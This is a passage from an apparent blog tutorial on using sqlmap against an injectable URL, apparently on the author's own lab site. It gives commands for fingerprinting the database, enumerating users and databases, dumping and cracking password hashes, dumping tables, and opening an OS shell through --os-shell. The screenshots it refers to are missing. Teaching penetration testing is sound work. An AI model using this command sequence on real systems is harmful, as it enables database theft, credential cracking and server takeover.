The result would be as below. It would give some important information about the vulnerable website like web application technology and back end DBMS.
Now let’s fingerprint the database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 -f
It will fingerprint the database as shown below.
Now let’s get the banner of the database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 -b as shown below.
We can see the banner as shown below.
Now let’s find out who is the current user of the database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –current-user as shown below.
We can see the result below.
Lets’ find out the hostname of the webserver. Type command sqlmap.py -u www.shunya.com/about.php?id=1 –hostname as shown below.
We can see the hostname as shown below.
Now let’s find out the name of the current database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –current-db
We will get the name of the current database as shown below. Here our database’s name is ‘shunya’.
Now we will enumerate all the users of the database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 —users
We can see all the users of the database as shown below.
Now let’s see if we can get any passwords of the DBMS users. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –passwords as shown below.
We can see below that we got password hashes for one user because I have set password for only one user.
Now let’s see the privileges of these users. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –privileges as shown below.
We can see the privileges of users as shown below.
Now let’s see the roles of the DBMS users. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –roles
The result is as shown below.
Now let’s see all the databases. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –dbs
The result shows a list of databases present, as shown below.
Now let’s get the list of all tables present. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –tables
We get the list of tables categorized with respective databases.
Similarly we can get list of all the columns. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –columns
The result is below.
Suppose we want to retrieve the number of entries in tables from the current database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –count.
The result is below.
Now let’s dump all the entries in the tables from current database. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –dump
The command will dump all the columns present in the current database as shown below.
If you want to dump the fields of all the databases, you can use the command sqlmap.py -u www.shunya.com/about.php?id=1 –dump-all
Ok, now let’s evaluate a specific database of interest. Let’s find the tables present in database shunya. sqlmap.py -u www.shunya.com/about.php?id=1 -D shunya –tables as ahown below.
We can see the results as shown below.
Now let’s find out the columns in the table ‘employees’. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 -D shunya -T employees –columns as shown below.
We get the column names as shown below.
Now let’s dump the columns “id,username,password”. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 -D shunya -T employees -C id,username,password –dump
The result is as below. We can see the password hashes and usernames.
when sqlmap recognizes hashes in the password field it will ask you whether you want it to crack the hashes automatically using dictionary-based attack. when you select “yes” it will crack the hashes as shown below.
We can even get shell access using sqlmap. Type the command sqlmap.py -u www.shunya.com/about.php?id=1 –os-shell as shown below.
It will prompt us to select the web application language used by the web server. We already know the web application language is php.
It will automatically try to retrieve the root directory of the web server and directly give access to shell as shown below. In my case it somehow failed.
We are inside the shell. Type “dir” to see the contents of the root directory.
No comments:
Post a Comment